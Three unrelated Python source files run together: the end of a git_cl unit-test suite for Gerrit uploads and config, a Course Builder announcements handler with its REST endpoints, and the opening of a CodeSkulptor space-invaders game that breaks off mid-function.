'log', '--pretty=format:%s%n%n%b', 'fake_ancestor_sha...'],), 'foo'), ((['git', 'config', 'user.email'],), 'me@example.com'), ((['git', 'diff', '--no-ext-diff', '--stat', '--find-copies-harder', '-l100000', '-C50', 'fake_ancestor_sha', 'HEAD'],), '+dat'), ] @staticmethod def _gerrit_upload_calls(description, reviewers): calls = [ ((['git', 'config', 'gerrit.host'],), 'gerrit.example.com'), ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), description) ] if git_cl.CHANGE_ID not in description: calls += [ ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), description), ((['git', 'commit', '--amend', '-m', description],), ''), ((['git', 'log', '--pretty=format:%s\n\n%b', 'fake_ancestor_sha..HEAD'],), description) ] calls += [ ((['git', 'rev-list', 'origin/master..'],), ''), ((['git', 'config', 'rietveld.cc'],), '') ] receive_pack = '--receive-pack=git receive-pack ' receive_pack += '--cc=joe@example.com' # from watch list if reviewers: receive_pack += ' ' receive_pack += ' '.join( '--reviewer=' + email for email in sorted(reviewers)) receive_pack += '' calls += [ ((['git', 'push', receive_pack, 'origin', 'HEAD:refs/for/master'],), '') ] return calls def _run_gerrit_upload_test( self, upload_args, description, reviewers): """Generic gerrit upload test framework.""" self.calls = self._gerrit_base_calls() self.calls += self._gerrit_upload_calls(description, reviewers) git_cl.main(['upload'] + upload_args) def test_gerrit_upload_without_change_id(self): self._run_gerrit_upload_test( [], 'desc\n\nBUG=\n', []) def test_gerrit_no_reviewer(self): self._run_gerrit_upload_test( [], 'desc\n\nBUG=\nChange-Id:123456789\n', []) def test_gerrit_reviewers_cmd_line(self): self._run_gerrit_upload_test( ['-r', 'foo@example.com'], 'desc\n\nBUG=\nChange-Id:123456789', ['foo@example.com']) def test_gerrit_reviewer_multiple(self): self._run_gerrit_upload_test( [], 'desc\nTBR=reviewer@example.com\nBUG=\nR=another@example.com\n' 'Change-Id:123456789\n', ['reviewer@example.com', 'another@example.com']) def test_config_gerrit_download_hook(self): self.mock(git_cl, 'FindCodereviewSettingsFile', CodereviewSettingsFileMock) def ParseCodereviewSettingsContent(content): keyvals = {} keyvals['CODE_REVIEW_SERVER'] = 'gerrit.chromium.org' keyvals['GERRIT_HOST'] = 'gerrit.chromium.org' keyvals['GERRIT_PORT'] = '29418' return keyvals self.mock(git_cl.gclient_utils, 'ParseCodereviewSettingsContent', ParseCodereviewSettingsContent) self.mock(git_cl.os, 'access', self._mocked_call) self.mock(git_cl.os, 'chmod', self._mocked_call) src_dir = os.path.join(os.path.sep, 'usr', 'local', 'src') def AbsPath(path): if not path.startswith(os.path.sep): return os.path.join(src_dir, path) return path self.mock(git_cl.os.path, 'abspath', AbsPath) commit_msg_path = os.path.join(src_dir, '.git', 'hooks', 'commit-msg') def Exists(path): if path == commit_msg_path: return False # others paths, such as /usr/share/locale/.... return True self.mock(git_cl.os.path, 'exists', Exists) self.mock(git_cl, 'urlretrieve', self._mocked_call) self.mock(git_cl, 'hasSheBang', self._mocked_call) self.calls = [ ((['git', 'config', 'rietveld.autoupdate'],), ''), ((['git', 'config', 'rietveld.server', 'gerrit.chromium.org'],), ''), ((['git', 'config', '--unset-all', 'rietveld.cc'],), ''), ((['git', 'config', '--unset-all', 'rietveld.private'],), ''), ((['git', 'config', '--unset-all', 'rietveld.tree-status-url'],), ''), ((['git', 'config', '--unset-all', 'rietveld.viewvc-url'],), ''), ((['git', 'config', '--unset-all', 'rietveld.bug-prefix'],), ''), ((['git', 'config', '--unset-all', 'rietveld.cpplint-regex'],), ''), ((['git', 'config', '--unset-all', 'rietveld.cpplint-ignore-regex'],), ''), ((['git', 'config', '--unset-all', 'rietveld.project'],), ''), ((['git', 'config', 'gerrit.host', 'gerrit.chromium.org'],), ''), # DownloadHooks(False) ((['git', 'config', 'gerrit.host'],), 'gerrit.chromium.org'), ((['git', 'rev-parse', '--show-cdup'],), ''), ((commit_msg_path, os.X_OK,), False), (('https://gerrit-review.googlesource.com/tools/hooks/commit-msg', commit_msg_path,), ''), ((commit_msg_path,), True), ((commit_msg_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR,), ''), # GetCodereviewSettingsInteractively ((['git', 'config', 'rietveld.server'],), 'gerrit.chromium.org'), (('Rietveld server (host[:port]) [https://gerrit.chromium.org]:',), ''), ((['git', 'config', 'rietveld.cc'],), ''), (('CC list:',), ''), ((['git', 'config', 'rietveld.private'],), ''), (('Private flag (rietveld only):',), ''), ((['git', 'config', 'rietveld.tree-status-url'],), ''), (('Tree status URL:',), ''), ((['git', 'config', 'rietveld.viewvc-url'],), ''), (('ViewVC URL:',), ''), # DownloadHooks(True) ((['git', 'config', 'rietveld.bug-prefix'],), ''), (('Bug Prefix:',), ''), ((commit_msg_path, os.X_OK,), True), ] git_cl.main(['config']) def test_update_reviewers(self): data = [ ('foo', [], 'foo'), ('foo\nR=xx', [], 'foo\nR=xx'), ('foo\nTBR=xx', [], 'foo\nTBR=xx'), ('foo', ['a@c'], 'foo\n\nR=a@c'), ('foo\nR=xx', ['a@c'], 'foo\n\nR=a@c, xx'), ('foo\nTBR=xx', ['a@c'], 'foo\n\nR=a@c\nTBR=xx'), ('foo\nTBR=xx\nR=yy', ['a@c'], 'foo\n\nR=a@c, yy\nTBR=xx'), ('foo\nBUG=', ['a@c'], 'foo\nBUG=\nR=a@c'), ('foo\nR=xx\nTBR=yy\nR=bar', ['a@c'], 'foo\n\nR=a@c, xx, bar\nTBR=yy'), ('foo', ['a@c', 'b@c'], 'foo\n\nR=a@c, b@c'), ('foo\nBar\n\nR=\nBUG=', ['c@c'], 'foo\nBar\n\nR=c@c\nBUG='), ('foo\nBar\n\nR=\nBUG=\nR=', ['c@c'], 'foo\nBar\n\nR=c@c\nBUG='), # Same as the line before, but full of whitespaces. ( 'foo\nBar\n\n R = \n BUG = \n R = ', ['c@c'], 'foo\nBar\n\nR=c@c\n BUG =', ), # Whitespaces aren't interpreted as new lines. ('foo BUG=allo R=joe ', ['c@c'], 'foo BUG=allo R=joe\n\nR=c@c'), ] expected = [i[2] for i in data] actual = [] for orig, reviewers, _expected in data: obj = git_cl.ChangeDescription(orig) obj.update_reviewers(reviewers) actual.append(obj.description) self.assertEqual(expected, actual) def test_trybots_from_PRESUBMIT(self): TEST_MASTER = 'testMaster' TEST_BUILDER = 'testBuilder' MASTERS = {TEST_MASTER:{TEST_BUILDER:['a']}} self.mock(presubmit_support, 'DoGetTryMasters', lambda *args: MASTERS) change_mock = ChangeMock() changelist_mock = ChangelistMock(change_mock) self.mock(git_cl, 'is_dirty_git_tree', lambda x: False) self.mock(git_cl, 'print_stats', lambda *arg: True) self.mock(git_cl, 'Changelist', lambda *args: changelist_mock) self.mock(git_cl, 'CreateDescriptionFromLog', lambda arg: 'Commit message') self.mock(git_cl.ChangeDescription, 'prompt', lambda self: None) self.calls = [ ((['git', 'config', 'rietveld.autoupdate',],), ''), ((['git', 'config', 'gerrit.host',],), ''), ((['git', 'rev-parse', '--show-cdup',],), ''), ((['git', 'config', 'rietveld.private',],), ''), ((['git', 'config', '--local', '--get-regexp', '^svn-remote\\.'],), ''), ((['git', 'config', 'rietveld.project',],), ''), ((['git', 'rev-parse', 'HEAD',],), ''), ] stored_description = [] def check_upload(args): i = 0 for arg in args: if arg == '--message': break i += 1 self.assertTrue(i < len(args)) stored_description.append(args[i+1]) return 1, 2 self.mock(git_cl.upload, 'RealMain', check_upload) git_cl.main(['upload', '--bypass-hooks', '--auto-bots']) found = re.search("CQ_TRYBOTS=(.*?)$", stored_description[0]) self.assertTrue(found) self.assertEqual(found.group(1), '%s:%s' % (TEST_MASTER, TEST_BUILDER)) class ChangelistMock(object): # Disable "Method could be a function" # pylint: disable=R0201 def __init__(self, change_mock): self.change_mock = change_mock def GetChange(self, *args): return self.change_mock def GetIssue(self): return None def GetBranch(self): return [] def GetCommonAncestorWithUpstream(self): return [] def GetCCList(self): return [] def GetGitBaseUrlFromConfig(self): return '' def GetRemoteUrl(self): return '' def GetRietveldServer(self): return None def SetWatchers(self, *args): pass def SetIssue(self, issue): pass def SetPatchset(self, issue): pass class ChangeMock(object): # Disable "Method could be a function" # pylint: disable=R0201 def __init__(self): self.stored_description = None def SetDescriptionText(self, desc): self.stored_description = desc def FullDescriptionText(self): return 'HIHI TEST DESCRIPTION' def RepositoryRoot(self): return [] def AffectedFiles(self): return [] def LocalPaths(self): return None if __name__ == '__main__': git_cl.logging.basicConfig( level=git_cl.logging.DEBUG if '-v' in sys.argv else git_cl.logging.ERROR) unittest.main()
# Copyright 2012 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Classes and methods to create and manage Announcements.""" __author__ = 'Saifu Angto (saifu@google.com)' import datetime import json import urllib from controllers.utils import BaseHandler from controllers.utils import BaseRESTHandler from controllers.utils import ReflectiveRequestHandler from controllers.utils import XsrfTokenManager from models import entities from models import roles from models.models import MemcacheManager import models.transforms as transforms import modules.announcements.samples as samples from modules.oeditor import oeditor from google.appengine.ext import db import markdown # TODO(psimakov): we should really use an ordered dictionary, not plain text; it # can't be just a normal dict because a dict iterates its items in undefined # order; thus when we render a dict to JSON an order of fields will not match # what we specify here; the final editor will also show the fields in an # undefined order; for now we use the raw JSON, rather than the dict, but will # move to an ordered dict later SCHEMA_JSON = """ { "id": "Announcement Entity", "type": "object", "description": "Announcement", "properties": { "key" : {"type": "string"}, "title": {"optional": true, "type": "string"}, "date": {"optional": true, "type": "date"}, "is_html": {"type": "boolean"}, "html": {"optional": true, "type": "text"}, "is_draft": {"type": "boolean"} } } """ SCHEMA_DICT = json.loads(SCHEMA_JSON) # inputex specific schema annotations to control editor look and feel SCHEMA_ANNOTATIONS_DICT = [ (['title'], 'Announcement'), (['properties', 'key', '_inputex'], { 'label': 'ID', '_type': 'uneditable'}), (['properties', 'title', '_inputex'], {'label': 'Title'}), (['properties', 'date', '_inputex'], { 'label': 'Date', '_type': 'date', 'dateFormat': 'Y/m/d', 'valueFormat': 'Y/m/d'}), oeditor.create_bool_select_annotation( ['properties', 'is_html'], 'Type', 'Html', 'WikiText'), (['properties', 'html', '_inputex'], {'label': 'Body', '_type': 'text'}), oeditor.create_bool_select_annotation( ['properties', 'is_draft'], 'Status', 'Draft', 'Published')] class AnnouncementsRights(object): """Manages view/edit rights for announcements.""" @classmethod def can_view(cls, unused_handler): return True @classmethod def can_edit(cls, handler): return roles.Roles.is_course_admin(handler.app_context) @classmethod def can_delete(cls, handler): return cls.can_edit(handler) @classmethod def can_add(cls, handler): return cls.can_edit(handler) @classmethod def apply_rights(cls, handler, items): """Filter out items that current user can't see.""" if AnnouncementsRights.can_edit(handler): return items allowed = [] for item in items: if not item.is_draft: allowed.append(item) return allowed class AnnouncementsHandler(BaseHandler, ReflectiveRequestHandler): """Handler for announcements.""" default_action = 'list' get_actions = [default_action, 'edit'] post_actions = ['add', 'delete'] @classmethod def get_child_routes(cls): """Add child handlers for REST.""" return [('/rest/announcements/item', AnnouncementsItemRESTHandler)] def get_action_url(self, action, key=None): args = {'action': action} if key: args['key'] = key return self.canonicalize_url( '/announcements?%s' % urllib.urlencode(args)) def format_items_for_template(self, items): """Formats a list of entities into template values.""" template_items = [] for item in items: item = transforms.entity_to_dict(item) # add 'edit' actions if AnnouncementsRights.can_edit(self): item['edit_action'] = self.get_action_url('edit', item['key']) item['delete_xsrf_token'] = self.create_xsrf_token('delete') item['delete_action'] = self.get_action_url( 'delete', item['key']) template_items.append(item) output = {} output['children'] = template_items # add 'add' action if AnnouncementsRights.can_edit(self): output['add_xsrf_token'] = self.create_xsrf_token('add') output['add_action'] = self.get_action_url('add') return output def put_sample_announcements(self): """Loads sample data into a database.""" items = [] for item in samples.SAMPLE_ANNOUNCEMENTS: entity = AnnouncementEntity() transforms.dict_to_entity(entity, item) entity.put() items.append(entity) return items def get_list(self): """Shows a list of announcements.""" if not self.personalize_page_and_get_enrolled(): return items = AnnouncementEntity.get_announcements() if not items and AnnouncementsRights.can_edit(self): items = self.put_sample_announcements() items = AnnouncementsRights.apply_rights(self, items) # Text could be HTML or wiki text (markdown syntax). # Transform to HTML if it is wiki text. for item in items: if item.is_html == False: item.html = markdown.markdown(item.html) self.template_value['announcements'] = self.format_items_for_template( items) self.template_value['navbar'] = {'announcements': True} self.render('announcements.html') def get_edit(self): """Shows an editor for an announcement.""" if not AnnouncementsRights.can_edit(self): self.error(401) return key = self.request.get('key') exit_url = self.canonicalize_url( '/announcements#%s' % urllib.quote(key, safe='')) rest_url = self.canonicalize_url('/rest/announcements/item') form_html = oeditor.ObjectEditor.get_html_for( self, SCHEMA_JSON, SCHEMA_ANNOTATIONS_DICT, key, rest_url, exit_url) self.template_value['navbar'] = {'announcements': True} self.template_value['content'] = form_html self.render('bare.html') def post_delete(self): """Deletes an announcement.""" if not AnnouncementsRights.can_delete(self): self.error(401) return key = self.request.get('key') entity = AnnouncementEntity.get(key) if entity: entity.delete() self.redirect('/announcements') def post_add(self): """Adds a new announcement and redirects to an editor for it.""" if not AnnouncementsRights.can_add(self): self.error(401) return entity = AnnouncementEntity() entity.title = 'Sample Announcement' entity.date = datetime.datetime.now().date() entity.is_html = True entity.html = 'Here is my announcement!' entity.is_draft = True entity.put() self.redirect(self.get_action_url('edit', entity.key())) class AnnouncementsItemRESTHandler(BaseRESTHandler): """Provides REST API for an announcement.""" def get(self): """Handles REST GET verb and returns an object as JSON payload.""" key = self.request.get('key') try: entity = AnnouncementEntity.get(key) except db.BadKeyError: entity = None if not entity: transforms.send_json_response( self, 404, 'Object not found.', {'key': key}) return viewable = AnnouncementsRights.apply_rights(self, [entity]) if not viewable: transforms.send_json_response( self, 401, 'Access denied.', {'key': key}) return entity = viewable[0] json_payload = transforms.dict_to_json(transforms.entity_to_dict( entity), SCHEMA_DICT) transforms.send_json_response( self, 200, 'Success.', payload_dict=json_payload, xsrf_token=XsrfTokenManager.create_xsrf_token( 'announcement-put')) def put(self): """Handles REST PUT verb with JSON payload.""" request = json.loads(self.request.get('request')) key = request.get('key') if not self.assert_xsrf_token_or_fail( request, 'announcement-put', {'key': key}): return if not AnnouncementsRights.can_edit(self): transforms.send_json_response( self, 401, 'Access denied.', {'key': key}) return entity = AnnouncementEntity.get(key) if not entity: transforms.send_json_response( self, 404, 'Object not found.', {'key': key}) return payload = request.get('payload') transforms.dict_to_entity(entity, transforms.json_to_dict( json.loads(payload), SCHEMA_DICT)) entity.put() transforms.send_json_response(self, 200, 'Saved.') class AnnouncementEntity(entities.BaseEntity): """A class that represents a persistent database entity of announcement.""" title = db.StringProperty(indexed=False) date = db.DateProperty() is_html = db.BooleanProperty() html = db.TextProperty(indexed=False) is_draft = db.BooleanProperty() memcache_key = 'announcements' @classmethod def get_announcements(cls, allow_cached=True): items = MemcacheManager.get(cls.memcache_key) if not allow_cached or items is None: items = AnnouncementEntity.all().order('-date').fetch(1000) # TODO(psimakov): prepare to exceed 1MB max item size # read more here: http://stackoverflow.com # /questions/5081502/memcache-1-mb-limit-in-google-app-engine MemcacheManager.set(cls.memcache_key, items) return items def put(self): """Do the normal put() and also invalidate memcache.""" result = super(AnnouncementEntity, self).put() MemcacheManager.delete(self.memcache_key) return result def delete(self): """Do the normal delete() and invalidate memcache.""" super(AnnouncementEntity, self).delete() MemcacheManager.delete(self.memcache_key)
# Simple implementation of GalaxyInvanders game # Rohan Roy (India) - 3 Nov 2013 # www.codeskulptor.org/#user23_fTVPDKIDhRdCfUp VER = "1.0" # "add various aliens" import simplegui, math, random, time #Global const FIELD_WIDTH = 850 FIELD_HEIGHT = 500 TOP_MARGIN = 75 LEFT_MARGIN = 25 ALIEN_WIDTH = 48 ALIEN_HEIGHT = 55 PLAYER_SPEED = 10 BULLET_SPEED = 10 BULLET_POWER = 1 BONUS_SPEED = 10 ALIEN_SPEED = [3, 5] # Images: pImage = simplegui.load_image('https://dl.dropbox.com/s/zhnjucatewcmfs4/player.png') aImages = [] for i in range(7): aImages.append([]) aImages[0].append(simplegui.load_image('https://dl.dropbox.com/s/0cck7w6r0mt8pzz/alien_1_1.png')) aImages[0].append(simplegui.load_image('https://dl.dropbox.com/s/j0kubnhzajbdngu/alien_1_2.png')) aImages[0].append(simplegui.load_image('https://dl.dropbox.com/s/zkeu6hqh9bakj25/alien_1_3.png')) aImages[1].append(simplegui.load_image('https://dl.dropbox.com/s/e75mkcylat70lnd/alien_2_1.png')) aImages[1].append(simplegui.load_image('https://dl.dropbox.com/s/pgjvaxg0z6rhco9/alien_2_2.png')) aImages[1].append(simplegui.load_image('https://dl.dropbox.com/s/en0hycfsi3cuzuo/alien_2_3.png')) aImages[2].append(simplegui.load_image('https://dl.dropbox.com/s/fu9weoll70acs8f/alien_3_1.png')) aImages[2].append(simplegui.load_image('https://dl.dropbox.com/s/b2rxru2nt5q2r1u/alien_3_2.png')) aImages[2].append(simplegui.load_image('https://dl.dropbox.com/s/x66vgj9fc2jlg53/alien_3_3.png')) aImages[3].append(simplegui.load_image('https://dl.dropbox.com/s/7o04ljg52kniyac/alien_4_1.png')) aImages[3].append(simplegui.load_image('https://dl.dropbox.com/s/b3v6tvami0rvl6r/alien_4_2.png')) aImages[3].append(simplegui.load_image('https://dl.dropbox.com/s/j451arcevsag36h/alien_4_3.png')) aImages[4].append(simplegui.load_image('https://dl.dropbox.com/s/jlhdigkm79nncnm/alien_5_1.png')) aImages[4].append(simplegui.load_image('https://dl.dropbox.com/s/wvlvjsa8yl6gka3/alien_5_2.png')) aImages[4].append(simplegui.load_image('https://dl.dropbox.com/s/rrg4y1tnsbrh04r/alien_5_3.png')) aImages[5].append(simplegui.load_image('https://dl.dropbox.com/s/oufyfy590tzf7cx/alien_6_1.png')) aImages[5].append(simplegui.load_image('https://dl.dropbox.com/s/p4ehd9f6mo2xfzc/alien_6_2.png')) aImages[5].append(simplegui.load_image('https://dl.dropbox.com/s/815gq3xyh6wmc0t/alien_6_3.png')) aImages[6].append(simplegui.load_image('https://dl.dropbox.com/s/bv4ycocuomsvj50/alien_7_1.png')) aImages[6].append(simplegui.load_image('https://dl.dropbox.com/s/krs2gtvdxxve79z/alien_7_2.png')) aImages[6].append(simplegui.load_image('https://dl.dropbox.com/s/v2wczi8lxwczq87/alien_7_3.png')) #backgrounds bckg = [] bckg.append(simplegui.load_image("https://dl.dropbox.com/s/ibfu2t9vrh4bhxd/back01.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/pcl8vzby25ovis8/back02.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/g8nwo1t9s4i9usg/back03.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/ee8oilluf7pe98h/back04.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/7jfgjoxinzwwlx4/back05.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/wh01g2q3607snvz/back06.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/b72ltp2xii9utnr/back07.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/av73jek8egezs1w/back08.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/ik54ttfklv3x3ai/back09.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/e9e6kpyg3yuoenc/back10.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/zrabwnnvlwvn7it/back11.jpg")) bckg.append(simplegui.load_image("https://dl.dropbox.com/s/a2infkx0rmn8b8m/back12.jpg")) # sounds sndPlayer = simplegui.load_sound('https://dl.dropbox.com/s/vl3as0o2m2wvlwu/player_shoot.wav') sndAlien = simplegui.load_sound('https://dl.dropbox.com/s/m4x0tldpze29hcr/alien_shoot.wav') sndPlayerExplosion = simplegui.load_sound('https://dl.dropbox.com/s/10fn2wh7kk7uoxh/explosion%2001.wav') sndAlienHit = simplegui.load_sound('https://dl.dropbox.com/s/80qdvup27n8j6r1/alien_hit.wav') sndAlienExplosion = simplegui.load_sound('https://dl.dropbox.com/s/qxm3je9vdlb469g/explosion_02.wav') sndBonus = simplegui.load_sound('https://dl.dropbox.com/s/tzp7e20e5v19l01/bonus.wav') sndPause = simplegui.load_sound('https://dl.dropbox.com/s/uzs9nixpd22asno/pause.wav') sndTheme = simplegui.load_sound('https://dl.dropbox.com/s/52zo892uemfkuzm/theme_01.mp3') sounds = [sndPlayer, sndAlien, sndPlayerExplosion, sndAlienExplosion, \ sndBonus, sndPause, sndTheme, sndAlienHit] #Global variables GameRunning = False GameEnded = False player_speed = 0 mes = "" timer_counter = 0 lives = 0 level = 1 scores = 0 killed = 0 current_back = 0 paused = False shoot_count = 0 level_time = [] ready, go = False, False #player = [FIELD_WIDTH //2, FIELD_HEIGHT - 30 + TOP_MARGIN] #game objects user_bullet = [] weapon_level = 1 weapon_speed = BULLET_SPEED alien_bullets = [] alien_fleet = None player = None frame = None aTimer = None dTimer = None bonuses = [] dCounter = 0 back = False bonus_count = [0, 0, 0, 0] player_killed = False player_killed_at = 0 level_map = [] for i in range(7): level_map.append([]) level_map[0] = [ 0, 0, 0, 0] level_map[1] = [129, 0, 0, 0] level_map[2] = [195, 129, 0, 0] level_map[3] = [255, 195, 60, 0] level_map[4] = [255, 231, 195, 195] level_map[5] = [255, 255, 231, 195] level_map[6] = [255, 255, 255, 231] def draw_text(canvas, text, point, size, delta, color): canvas.draw_text(text, point, size, color[0]) canvas.draw_text(text, [point[0]-delta[0], \ point[1]-delta[1]], size, color[1]) class Bonus: def __init__ (self, kind, point): self.kind = kind self.x = point[0] self.y = point[1] self.v = BONUS_SPEED #velocity self.width = 36 self.height = 36 return self def move(self): self.y += self.v return self def draw(self, canvas): if self.kind == 0: #speed of bullet canvas.draw_circle([self.x, self.y], 15, 3, "LightBlue") canvas.draw_text("WS", [self.x-12, self.y+5], self.width //2, "LightBlue") elif self.kind == 1: #weapon level canvas.draw_circle([self.x, self.y], 15, 3, "Red") canvas.draw_text("WL", [self.x-12, self.y+5], self.width //2, "Red") elif self.kind == 2: #life canvas.draw_circle([self.x, self.y], 15, 3, "LightGreen") canvas.draw_text("LF", [self.x-12, self.y+5], self.width //2, "LightGreen") elif self.kind == 3: #weapon power canvas.draw_circle([self.x, self.y], 15, 3, "8010df") canvas.draw_text("WP", [self.x-12, self.y+5], self.width //2, "8010df") return self def execute(self): global weapon_speed, weapon_level, player, scores, bonus_count bonus_count[self.kind] += 1 if self.kind == 0: #speed of bullet weapon_speed += 1 delta = round(math.pow(20, (1 + (1.0*level-1)/32))*5) scores = scores + delta elif self.kind == 1: #weapon level weapon_level += 1 delta = round(math.pow(30, (1 + (1.0*level-1)/32))*5) scores = scores + delta elif self.kind == 2: #life player.lives += 1 delta = round(math.pow(100, (1 + (1.0*level-1)/32))*5) scores = scores + delta elif self.kind == 3: #weapon power player.power += 0.1 delta = round(math.pow(100, (1 + (1.0*level-1)/32))*5) scores = scores + delta sndBonus.play() return self def dHandler(): global dCounter, back, player_killed dCounter += 1 if dCounter % 10 == 0: if back: frame.set_canvas_background("Red") else: frame.set_canvas_background("black") back = not back; if dCounter > 50: dCounter = 0 player_killed = False dTimer.stop() frame.set_canvas_background("black") class Bullet: def __init__ (self, point, color, velocity): self.x = point[0] self.y = point[1] self.color = color self.v = velocity self.width = 1 self.height = 1 def draw(self, canvas): canvas.draw_line([self.x, self.y-5], [self.x, self.y+5], 3, self.color) def move(self): self.y += self.v class Alien: def __init__(self, point, kind): self.x = point[0] self.y = point[1] self.kind = kind self.flying = False self.vy = 0 self.vx = 0 self.health = self.get_max_health() self.width = 20 self.height = 20 def get_max_health(self): return 1+0.6 * self.kind[1] def shoot(self): if len(alien_bullets)<level*2: bullet = Bullet([self.x, self.y], "LightRed", BULLET_SPEED) alien_bullets.append(bullet) sndAlien.play() def move(self, point): if self.flying: koef = 1.5 self.y += (self.vy / koef) if self.x>player.x: self.x -= (self.vx / koef) else: self.x += (self.vx / koef) if self.vx<ALIEN_SPEED[0]: self.vx += 1 if self.vy<ALIEN_SPEED[1]: self.vy += 1 else: self.x = point[0] self.y = point[1] def draw(self, canvas): if aImages[self.kind[1]][self.kind[0]].get_width()==0: w = 15 h = 15 canvas.draw_circle([self.x, self.y], 15, 5, "Red") else: # img = aImages[self.kind[1]][self.kind[0]] img = aImages[self.kind[1]][self.kind[0]] self.width = w = img.get_width() self.height = h = img.get_height() canvas.draw_image(img, (w//2, h//2), (w, h), (self.x, self.y), (w, h)) if self.health<>self.get_max_health(): ratio = w * (self.health*1.0) / self.get_max_health() canvas.draw_line([self.x-w//2, self.y-h//2-3], [self.x+w//2, self.y-h//2-3], 4, "red") canvas.draw_line([self.x-w//2, self.y-h//2-3], [self.x-w//2+ratio, self.y-h//2-3], 4, "green") return canvas class AliensFleet: def __init__ (self, point): def is_high_level(place): map_ = (level-1)%7 row = level_map[map_][place[1]] #255 - 0 return (row & (1 << place[0]))<>0 self.x = point[0] self.y = point[1] self.aliens = [] self.pattern = [255, 255, 255, 255] self.y_velocity = ALIEN_HEIGHT//3 + 1 self.x_velocity = - ALIEN_WIDTH//3 + 1 for i in range(self.get_aliens_count()): point = self.get_alien_position(i) place = self.get_alien_place(i) alien_level = (level-1)//7 + is_high_level(place) alien = Alien(point, [random.randrange(3), alien_level]) self.aliens.append(alien) def get_aliens_count(self): c = 0 for i in range(4): for j in range(8): if (self.pattern[i] & (1 << j))<>0: c+=1 return c def get_alien_position(self, n): #returns a screen x, y of alien with number n point = self.get_alien_place(n) x = point[0]*(ALIEN_WIDTH + 3) + self.x y = point[1]*(ALIEN_HEIGHT + 3) +self.y point = [x, y] return point def get_alien_place(self, n): #returns a fleet x, y of alien with number n x, y, c = 0, 0, 0 for i in range(4): for j in range(8): if (self.pattern[i] & (1 << j))<>0: if c==n: x, y = j, i c+=1 point = [x, y] return point def move_aliens(self): i = 0 for alien in self.aliens: point = self.get_alien_position(i) alien.move(point) i += 1 return self def move_down(self): self.y += self.y_velocity if self.y>400: player.explode() self.y = 100 self.move_aliens() def move_side(self): self.x -= self.x_velocity # check borders of fleet: left = 8 right = -1 for i in range(len(self.aliens)): point = self.get_alien_place(i) if point[0]<left: left = point[0] if point[0]>right: right = point[0] if (self.x+(left+1)*60 < LEFT_MARGIN + 10) or (self.x + (right+1)*45>FIELD_WIDTH-LEFT_MARGIN-60): self.x_velocity = -self.x_velocity self.move_aliens() def draw(self, canvas): for alien in self.aliens: alien.draw(canvas) def make_shoot(self): for alien in self.aliens: if len(alien_bullets) < level * 3 + 1: if random.randrange(101)<2: # alien.shoot() return self def alien_fly(self): i = 0 for alien in self.aliens: if alien.flying: i += 1 if (i<1+level) and (random.randrange(1000)<3) and (time.time()-level_time[len(level_time)-1]>60): alien.flying=True def check_death(self): global scores, killed, player i = 0 for bullet in user_bullet: for i in range(len(self.aliens)): alien = self.aliens[i] if isBulletHit(bullet, alien): if alien.health-player.power<=0: point = self.get_alien_place(i) sndAlienExplosion.play() self.aliens.remove(alien) x = ~int((1 << point[0])) self.pattern[point[1]] = self.pattern[point[1]] & x user_bullet.remove(bullet) delta = round(math.pow(5, (1 + (1.0*level-1)/32))*5) scores = scores + delta killed += 1 x = random.randrange(1000) if x<5: bonus = Bonus(3, [alien.x, alien.y]) bonuses.append(bonus) elif x<50: bonus = Bonus(2, [alien.x, alien.y]) bonuses.append(bonus) elif x<120: bonus = Bonus(1, [alien.x, alien.y]) bonuses.append(bonus) elif x<200: bonus = Bonus(0, [alien.x, alien.y]) bonuses.append(bonus) if killed % 500 == 0: player.lives += 1 sndBonus.play() break else: user_bullet.remove(bullet) alien.health -= player.power sndAlienHit.play() i += 1 class Player: def __init__(self, point, lives): self.x = point[0] self.y = point[1] self.lives = 3 self.speed = player_speed self.power = BULLET_POWER self.width = 20 self.height = 20 def draw(self, canvas): draw_user_image(canvas, [self.x, self.y]) def move(self): self.x += player_speed if self.x<LEFT_MARGIN*2: self.x = LEFT_MARGIN*2 if self.x>FIELD_WIDTH: self.x=FIELD_WIDTH def draw_lives_counter(self, canvas): if self.lives < 5: for i in range(self.lives): draw_user_image(canvas, [150+i*35, 15]) else: draw_user_image(canvas, [150, 15]) canvas.draw_text(" x "+str(int(self.lives)), [170, 25], 25, "Yellow") def explode(self): global dTimer, alien_bullets, user_bullet, weapon_level, weapon_speed global alien_fleet, player_killed_at, player_killed, player_speed player_speed = 0 player_killed_at = time.time() sndPlayerExplosion.play() for alien in alien_fleet.aliens: alien.flying = False player_killed = True alien_bullets = [] user_bullet = [] bonuses = [] weapon_level = level // 10 + 1 weapon_speed = BULLET_SPEED self.lives -= 1 if self.lives<0: stop_game() dTimer = simplegui.create_timer(25, dHandler) dTimer.start() #helper functions def dummy(key): return key def pause(): global paused paused = not paused sndPause.play() def draw_user_image(canvas, point): # draw a image of user ship # global player if pImage.get_width()==0: canvas.draw_circle(point, 12, 5, "Yellow") else: canvas.draw_image(pImage, (25, 36), (49, 72), point, (34, 50)) player.width = pImage.get_width() player.height = pImage.get_height() return canvas def draw_lives(canvas): # draw lives counter canvas.draw_text("Lives : ", [30, 25], 25, "Red") if player<>None: player.draw_lives_counter(canvas) return canvas def draw_weapons(canvas): canvas.draw_text("Weapon : ", [30, 60], 25, "Red") canvas.draw_text("Rocket lvl: "+str(int(weapon_level)), [135, 60], 25, "Yellow") canvas.draw_text("WS:"+str(weapon_speed/10.0), [280, 48], 10, "00c5fe") 